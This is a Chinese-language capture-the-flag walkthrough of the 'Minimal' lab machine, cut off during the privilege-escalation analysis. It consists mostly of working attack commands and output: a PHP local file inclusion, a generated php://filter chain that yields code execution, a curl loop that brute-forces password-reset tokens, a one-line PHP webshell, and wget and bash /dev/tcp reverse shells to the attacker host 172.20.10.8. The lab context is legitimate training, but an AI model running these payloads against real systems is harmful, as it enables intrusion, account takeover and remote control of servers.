![\"image-20240416165203824\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404162156635.png\")
<\/div>\n
![\"image-20240404180309742\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404162156639.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nnmap -sCV -p 1-65535 172.20.10.6<\/code><\/pre>\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 256 d2:73:06:e2:e4:84:54:8c:42:0f:4e:81:7c:78:b9:c2 (ECDSA)\n|_ 256 75:a0:cf:35:61:a1:c8:77:cf:1a:cb:bc:6d:5b:49:75 (ED25519)\n80\/tcp open http Apache httpd 2.4.52 ((Ubuntu))\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\n| http-cookie-flags: \n| \/: \n| PHPSESSID: \n|_ httponly flag not set\n|_http-title: Minimal Shop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\nffuf -u http:\/\/172.20.10.6\/FUZZ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt <\/code><\/pre>\nimgs [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 0ms]\nstyles [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 0ms]\nserver-status [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 3ms]<\/code><\/pre>\nsudo dirsearch -u http:\/\/172.20.10.6\/ -e* -i 200,300-399 2>\/dev\/null<\/code><\/pre>\n[06:07:27] 302 - 0B - \/admin.php -> login.php\n[06:07:36] 200 - 0B - \/config.php\n[06:07:44] 200 - 450B - \/login.php\n[06:07:44] 302 - 0B - \/logout.php -> \/index.php\n[06:07:51] 200 - 427B - \/register.php\n[06:07:51] 200 - 12B - \/robots.txt\n[06:07:55] 301 - 311B - \/styles -> http:\/\/172.20.10.6\/styles\/<\/code><\/pre>\n\u6f0f\u6d1e\u6316\u6398<\/h2>\n\u8e29\u70b9<\/h3>\nview-source:http:\/\/172.20.10.6\/robots.txt\ngood luck :)<\/code><\/pre>\n![\"image-20240404180849025\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div>
\n<\/div><\/p>\n\u6709\u4e00\u4e2a\u767b\u5f55\u9875\u9762\uff1a<\/p>\n
<\/div><\/p>\n\u4e07\u80fd\u5bc6\u7801\uff0c\u5f31\u5bc6\u7801\uff0c\u4f46\u662f\u6ca1\u6210\u529f\uff0c\u5c1d\u8bd5\u5fd8\u8bb0\u5bc6\u7801\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u6ce8\u518c\u4e00\u4e2a\u8d26\u53f7\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u829c\u6e56\uff0c\u6362\u4e00\u4e2a\uff1a<\/p>\n
hack\nhack\nhack@hack.com<\/code><\/pre>\n\u767b\u5f55\u4e0a\u53bb\u4ee5\u540e\uff0c\u6dfb\u52a0\u4e24\u4e2a\u8bd5\u8bd5\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u5c1d\u8bd5\u70b9\u51fb\u8d2d\u4e70\uff1a<\/p>\n
<\/div><\/p>\n\u778e\u586b\u4e00\u4e0b\uff0c\u4f46\u662f\u6e05\u7a7a\u4ee5\u540e\u6ca1\u4e8b\u53d1\u751f\uff0c\u6ce8\u610f\u5230\u6b64\u65f6\u7684\u7f51\u5740\u4e3a\uff1a<\/p>\n
http:\/\/172.20.10.6\/shop_cart.php?action=buy<\/code><\/pre>\n\u5c1d\u8bd5\u4fee\u6539\u4e00\u4e0b\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u6267\u884c\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u6587\u4ef6\u5305\u542b\uff1a<\/p>\n
http:\/\/172.20.10.6\/shop_cart.php?action=php:\/\/filter\/read=convert.base64-encode\/resource=index<\/code><\/pre>\n<\/div><\/p>\n<?php\n\nrequire_once ".\/config.php";\n\nsession_start();\n\n\/\/ Get products\n$query = $conn->prepare("SELECT * FROM products");\n$query->execute();\n$products = $query->get_result();\n\n$logged = false;\n\nif (isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true) {\n $logged = true;\n}\n\nif ($_SERVER['REQUEST_METHOD'] === 'POST') {\n if(isset($_POST["product_id"])){\n $_SESSION['cart'][] = $_POST["product_id"];\n }\n}\n?>\n\n<html lang="es">\n\n<head>\n <meta charset="UTF-8">\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <link rel="stylesheet" href=".\/styles\/main.css">\n <title>Minimal Shop<\/title>\n<\/head>\n\n<body>\n <header>\n <div class="logo">\n <a href=".\/index.php">\n <h1>Minimal<\/h1>\n <\/a>\n <\/div>\n <\/div>\n <div class="boton-iniciar-sesion">\n <?php\n if ($logged) {\n echo '<a href="shop_cart.php">My cart<\/a>';\n echo '<a href="logout.php">Sign out<\/a>';\n } else {\n echo '<a href="login.php">Log In<\/a>';\n }\n ?>\n <\/div>\n <\/header>\n\n <main>\n <?php\n while ($fila = mysqli_fetch_assoc($products)) {\n $id = $fila['id'];\n $name = $fila['name'];\n $price = $fila['price'];\n $description = $fila['description'];\n $author = $fila['author'];\n\n echo '<form action="index.php" method="post">\n <div class="contenedor-producto">\n <div class="imagen-producto">\n <img src=".\/imgs\/' . $name . '.png" alt="Producto '.$id.'">\n <\/div>\n <div class="informacion-producto">\n <h2>' . $name . '<\/h2>\n <div class="descripcion">\n <p>Designer: ' . $author . '<\/p>\n <p>' . $description . '<\/p>\n <p>Price: $' . $price . '<\/p>\n <\/div>';\n if ($logged) {\n if (in_array($id, $_SESSION['cart'])) {\n echo '<p class="buy logtobuy">Added to cart<\/p>';\n }\n echo '<button class="buy button" type="submit" value="'. $id .'" name="product_id" >Buy<\/button>';\n } else {\n echo '<p class="buy logtobuy">Log In to buy<\/p>';\n }\n echo '\n <\/div>\n <\/div>\n <\/form>\n ';\n };\n ?>\n <\/main>\n<\/body>\n\n<\/html><\/code><\/pre>\nhttp:\/\/172.20.10.6\/shop_cart.php?action=php:\/\/filter\/read=convert.base64-encode\/resource=admin<\/code><\/pre>\n<\/div><\/p>\n\u89e3\u7801\u4e00\u4e0b\uff1a<\/p>\n
<?php\nrequire_once ".\/config.php";\n\nsession_start();\n\nif ($_SESSION['username'] !== 'admin') {\n header('Location: login.php');\n exit;\n}\n\n$logged = false;\n\nif (isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true) {\n $logged = true;\n}\n\nif ($_SERVER['REQUEST_METHOD'] === 'POST') {\n $nombre = $_POST['nombre'];\n $autor = $_POST['autor'];\n $precio = $_POST['precio'];\n $descripcion = $_POST['descripcion'];\n\n if (isset($_FILES['imagen'])) {\n $imagen = $_FILES['imagen'];\n if ($imagen['error'] === UPLOAD_ERR_OK) {\n $ruta_destino = '.\/imgs\/' . basename($imagen['name']);\n\n if (move_uploaded_file($imagen['tmp_name'], $ruta_destino)) {\n $query = $conn->prepare("INSERT INTO products (name, author, price, description) VALUES (?, ?, ?, ?)");\n $query->bind_param("ssds", $nombre, $autor, $precio, $descripcion);\n \/\/ Ejecutar la consulta\n if ($query->execute()) {\n echo "Uploaded";\n } else {\n echo "Error";\n }\n } else {\n \/\/"Error al subir la imagen.";\n echo "Error";\n }\n } else {\n echo "Error: " . $imagen['error'];\n }\n }\n}\n\n?>\n<!DOCTYPE html>\n<html>\n\n<head>\n <meta charset="UTF-8">\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <link rel="stylesheet" href=".\/styles\/main.css">\n <link rel="stylesheet" href=".\/styles\/admin.css">\n <title>Minimal Shop<\/title>\n<\/head>\n\n<body>\n <header>\n <div class="logo">\n <a href=".\/index.php">\n <h1>Minimal<\/h1>\n <\/a>\n <\/div>\n <\/div>\n <div class="boton-iniciar-sesion">\n <?php\n if ($logged) {\n echo '<a href="logout.php">Cerrar Sesi\u00f3n<\/a>';\n echo '<a href="shop_cart.php">Mi Carrito<\/a>';\n } else {\n echo '<a href="login.php">Iniciar Sesi\u00f3n<\/a>';\n }\n ?>\n <\/div>\n <\/header>\n <h1>Admin Panel<\/h1>\n <div class="container">\n <h1>Add new Product<\/h1>\n <form action="admin.php" method="post" enctype="multipart\/form-data">\n <label for="nombre">Name:<\/label>\n <input type="text" name="nombre" id="nombre" required>\n\n <label for="autor">Author:<\/label>\n <input type="text" name="autor" id="autor" required>\n\n <label for="precio">Price:<\/label>\n <input type="number" name="precio" id="precio" required>\n\n <label for="descripcion">Description:<\/label>\n <textarea name="descripcion" id="descripcion" required><\/textarea>\n\n <label for="imagen">Img:<\/label>\n <input type="file" name="imagen" id="imagen" accept="image\/*" required>\n\n <input type="submit" value="Upload">\n <\/form>\n <\/div>\n\n<\/body>\n\n<\/html><\/code><\/pre>\n\u65b9\u6cd5\u4e00\uff1aphp_filter_chain_generator<\/h3>\npython php_filter_chain_generator.py --chain '<?=`$_GET[0]` ?>'<\/code><\/pre>\nphp:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp<\/code><\/pre>\n\u8001\u6837\u5b50\uff0c\u8fdb\u884c\u8fde\u63a5\uff0c\u7136\u540e\u7ed9\u4e00\u4e2a\u53c2\u6570\uff0c\u4f20\u4e00\u4e2a\u53cd\u5f39shell\u8fc7\u53bb\uff0c\u5b8c\u6210RCE\u3002<\/p>\n
# kali\npython3 -m http.server 8888\n# minimal\nhttp:\/\/172.20.10.6\/shop_cart.php?action=payload&0=wget http:\/\/172.20.10.8:8888\/revershell.php<\/code><\/pre>\n<\/div>
\n<\/div><\/p>\n\u6210\u529f\u4e86\uff0c\u8fd0\u884c\u53cd\u5f39shell\uff1a<\/p>\n
# kali\nsudo pwncat-cs -lp 1234 2>\/dev\/null\n# minimal\nhttp:\/\/172.20.10.6\/shop_cart.php?action=payload&0=php revershell.php<\/code><\/pre>\n<\/div><\/p>\n\u5f39\u8fc7\u6765\u4e86\u3002<\/p>\n
\u65b9\u6cd5\u4e8c\uff1a\u91cd\u7f6e\u5bc6\u7801<\/h3>\n
\u7531\u4e8e\u6211\u4eec\u524d\u9762\u5f97\u5230\u7684 php \u6587\u4ef6\uff0c\u91cc\u9762\u7684\u5185\u5bb9GET\u5141\u8bb8\u6211\u4eec\u8fdb\u884cphp filter\u94fe\u6784\u9020\uff0c\u6211\u4eec\u53ef\u4ee5\u60f3\u5230\u4e4b\u524d\u6ca1\u6709\u8d77\u5230\u4f5c\u7528\u7684\u90a3\u4e2a\u5145\u503c\u5bc6\u7801\u7684\u754c\u9762\uff1a<\/p>\n
http:\/\/172.20.10.6\/reset_pass.php<\/code><\/pre>\n\u6211\u4eec\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u51fd\u6570\uff1a<\/p>\n
http:\/\/172.20.10.6\/shop_cart.php?action=php:\/\/filter\/read=convert.base64-encode\/resource=reset_pass<\/code><\/pre>\n<?php\nrequire_once ".\/config.php";\n\n$error = false;\n$done = false;\n$change_pass = false;\n\nsession_start();\n\n$username = null;\n\nif ($_SERVER['REQUEST_METHOD'] === 'POST') {\n $username = $_POST['username'];\n\n $query = $conn->prepare("SELECT * FROM users WHERE user = ?");\n $query->bind_param("s", $username);\n\n $query->execute();\n $result = $query->get_result();\n\n if ($result->num_rows == 1) {\n while ($row = $result->fetch_assoc()) {\n $name = $row['user'];\n $randomNumber = rand(1, 100);\n $nameWithNumber = $name . $randomNumber;\n $md5Hash = md5($nameWithNumber);\n $base64Encoded = base64_encode($md5Hash);\n\n $deleteQuery = $conn->prepare("DELETE FROM pass_reset WHERE user = ?");\n $deleteQuery->bind_param("s", $name);\n $deleteQuery->execute();\n\n $insertQuery = $conn->prepare("INSERT INTO pass_reset (user, token) VALUES (?, ?)");\n $insertQuery->bind_param("ss", $name, $base64Encoded);\n\n if ($insertQuery->execute()) {\n $error = false;\n $done = true;\n } else {\n $error = true;\n }\n }\n } else {\n $error = true;\n }\n}\n\nif ($_SERVER['REQUEST_METHOD'] === 'GET') {\n if (isset($_GET['user']) and isset($_GET['token']) and isset($_GET['newpass'])) {\n $user = $_GET['user'];\n $token = $_GET['token'];\n $newpass = $_GET['newpass'];\n\n \/\/ Paso 1: Verificar si el usuario y token coinciden en la tabla pass_reset\n $query = $conn->prepare("SELECT token FROM pass_reset WHERE user = ?");\n $query->bind_param("s", $user);\n $query->execute();\n $result = $query->get_result();\n\n if ($result->num_rows > 0) {\n $row = $result->fetch_assoc();\n $storedToken = $row['token'];\n\n if ($storedToken === $token) {\n \/\/ Paso 2: Actualizar la contrase\u00c3\u00b1a en la tabla users\n $updateQuery = $conn->prepare("UPDATE users SET pass = ? WHERE user = ?");\n $hashedPassword = password_hash($newpass, PASSWORD_DEFAULT);\n $updateQuery->bind_param("ss", $hashedPassword, $user);\n\n if ($updateQuery->execute()) {\n echo "Password updated";\n } else {\n echo "Error updating";\n }\n } else {\n echo "Not valid token";\n }\n } else {\n echo "Error http 418 ;) ";\n }\n }\n}\n?><\/code><\/pre>\n\u53ea\u7559\u4e0bphp\u4ee3\u7801\u4e86\uff0c\u5ba1\u8ba1\u4e00\u4e0b\u57fa\u672c\u903b\u8f91\uff1a<\/p>\n
\u751f\u6210\u4e00\u4e2a1~100\u7684\u968f\u673a\u6570\uff0c\u548cuser\u62fc\u63a5\u8d77\u6765\uff0c\u7136\u540eMD5\u52a0\u5bc6\uff0c\u7136\u540ebase64\u52a0\u5bc6\uff0c\u8fd9\u4e2a\u4f5c\u4e3atoken\uff0c\u800cuser\u5df2\u7ecf\u786e\u5b9a\u4e86\u4e3aadmin<\/code>\uff0c\u6211\u4eec\u8bd5\u51fa\u6765\u4e86\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\uff0c\u6211\u81ea\u5df1\u4e5f\u5c1d\u8bd5\u5199\u4e86\uff0c\u5148\u62ff\u4f5c\u8005\u7684\u8bb0\u5f55\u4ee5\u4e0b\u5427\uff0c\u6807\u51c6\u7b54\u6848\u561e\uff1a<\/p>\nname="admin"\n\nfor ((i=1; i<=100; i++)); do\n nameWithNumber="${name}${i}"\n md5Hash=$(echo -n "$nameWithNumber" | md5sum | awk '{print $1}')\n base64Encoded=$(echo -n "$md5Hash" | base64)\n curl -X GET "http:\/\/172.20.10.6\/reset_pass.php?user=admin&token=$base64Encoded&newpass=patata"\ndone<\/code><\/pre>\n\u7136\u540e\u8bbf\u95ee\uff1a<\/p>\n
http:\/\/172.20.10.6\/admin.php<\/code><\/pre>\n\u4f1a\u53d8\u6210\uff1a<\/p>\n
<\/div><\/p>\n\u7136\u540e\u968f\u4fbf\u4e0a\u4f20\u4e00\u4e2awebshell\u5373\u53ef\uff1a<\/p>\n
<?php system($_GET["hack"]);?><\/code><\/pre>\n<\/div><\/p>\n\u7136\u540e\u53cd\u5f39\u8fc7\u6765\uff1a<\/p>\n
http:\/\/172.20.10.6\/imgs\/shell.php?hack=bash -c "bash -i >%26 \/dev\/tcp\/172.20.10.8\/1234 0>%261"<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@minimal:\/var\/www\/html\/imgs$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@minimal:\/var\/www\/html\/imgs$ whoami\nwww-data\n(remote) www-data@minimal:\/var\/www\/html\/imgs$ sudo -l\nMatching Defaults entries for www-data on minimal:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser www-data may run the following commands on minimal:\n (root) NOPASSWD: \/opt\/quiz\/shop\n(remote) www-data@minimal:\/var\/www\/html\/imgs$ file \/opt\/quiz\/shop\n\/opt\/quiz\/shop: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=c12ae144027d5fe72a74c6af34ff0619064a699f, for GNU\/Linux 3.2.0, not stripped\n(remote) www-data@minimal:\/var\/www\/html\/imgs$ cd \/opt\/quiz\n(remote) www-data@minimal:\/opt\/quiz$ ls -la\ntotal 36\ndrwxr-xr-x 2 root root 4096 Nov 5 10:18 .\ndrwxr-xr-x 3 root root 4096 Nov 1 22:09 ..\n-rw------- 1 root root 2236 Nov 1 22:18 prize.txt\n-rw-r--r-- 1 root root 27 Nov 1 22:19 results.txt\n-rwxrwxr-x 1 root root 16632 Nov 5 10:18 shop\n(remote) www-data@minimal:\/opt\/quiz$ cat prize.txt \ncat: prize.txt: Permission denied\n(remote) www-data@minimal:\/opt\/quiz$ cat results.txt \nUser: 0xH3rshel\nPoints: 3\n\n(remote) www-data@minimal:\/opt\/quiz$ .\/shop\nHey guys, I have prepared this little program to find out how much you know about me, since I have been your administrator for 2 years.\nIf you get all the questions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash\nWhat is my favorite OS?\nlinux\nCorrect!!\nWhat is my favorite food?\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nNope!!\nWhat is my favorite text editor?\nNope!!\nUse sudo pls :)\n(remote) www-data@minimal:\/opt\/quiz$ .\/shop\nHey guys, I have prepared this little program to find out how much you know about me, since I have been your administrator for 2 years.\nIf you get all the questions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash\nWhat is my favorite OS?\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nNope!!\nSegmentation fault (core dumped)<\/code><\/pre>\n\u53cd\u7f16\u8bd1<\/h3>\n
\u53d1\u73b0\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\u3002\u6587\u4ef6\u4e0b\u8f7d\u5230\u672c\u5730\u6765\u8fdb\u884c\u53cd\u7f16\u8bd1\uff1a<\/p>\n
# main.c\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n __int64 v3; \/\/ rbp\n __int64 v4; \/\/ rdx\n signed __int64 v6; \/\/ [rsp-28h] [rbp-28h]\n signed int v7; \/\/ [rsp-20h] [rbp-20h]\n unsigned int v8; \/\/ [rsp-1Ch] [rbp-1Ch]\n const char *v9; \/\/ [rsp-18h] [rbp-18h]\n const char *v10; \/\/ [rsp-10h] [rbp-10h]\n __int64 v11; \/\/ [rsp-8h] [rbp-8h]\n\n __asm { endbr64 }\n v11 = v3;\n v6 = 3347146957242197362LL;\n v7 = 7633012;\n v10 = "Hey guys, I have prepared this little program to find out how much you know about me, since I have been your adm"\n "inistrator for 2 years.";\n v9 = "If you get all the questions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash";\n sub_4010C0(\n "Hey guys, I have prepared this little program to find out how much you know about me, since I have been your adminis"\n "trator for 2 years.",\n argv,\n envp);\n sub_4010C0(\n "If you get all the questions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash",\n argv,\n v4);\n v8 = question_1();\n v8 += question_2();\n v8 += question_3();\n writeResults(&v6, v8);\n if ( v8 == 3 )\n print_prize(3LL);\n if ( foo == 85 )\n wait_what();\n return 0;\n}<\/code><\/pre>\n\/\/ question1\nbool question_1(void)\n{\n int32_t iVar1;\n char *s1;\n\n puts("What is my favorite OS?");\n fgets(&s1, 200, _stdin);\n iVar1 = strcmp(&s1, "linux\\n");\n if (iVar1 != 0) {\n puts("Nope!!");\n } else {\n puts("Correct!!");\n }\n return iVar1 == 0;\n}\n<\/code><\/pre>\n\/\/ question2\nsigned __int64 __usercall question_2@<rax>(__int64 a1@<rdx>, __int64 a2@<rbp>, __int64 a3@<rsi>)\n{\n __int64 v3; \/\/ rdx\n signed __int64 result; \/\/ rax\n __int64 v5; \/\/ [rsp-88h] [rbp-88h]\n __int64 v6; \/\/ [rsp-18h] [rbp-18h]\n unsigned int v7; \/\/ [rsp-Ch] [rbp-Ch]\n __int64 v8; \/\/ [rsp-8h] [rbp-8h]\n\n __asm { endbr64 }\n v8 = a2;\n sub_4010C0("What is my favorite food?", a3, a1);\n sub_401110(&v5, 100LL, _bss_start);\n v7 = 5; \/\/ \u504f\u79fb\u91cf\n v6 = sub_4010E0();\n if ( v6 && *((_BYTE *)&v8 + v6 - 129) == 10 )\n *((_BYTE *)&v8 + v6 - 129) = 0;\n secret_q2(&v5, v7);\n if ( (unsigned int)sub_401120(&v5, "gfhts ufshfpjx") )\n {\n sub_4010C0("Nope!!", "gfhts ufshfpjx", v3);\n result = 0LL;\n }\n else\n {\n sub_4010C0("Correct!!", "gfhts ufshfpjx", v3);\n result = 1LL;\n }\n return result;\n}<\/code><\/pre>\n\/\/ 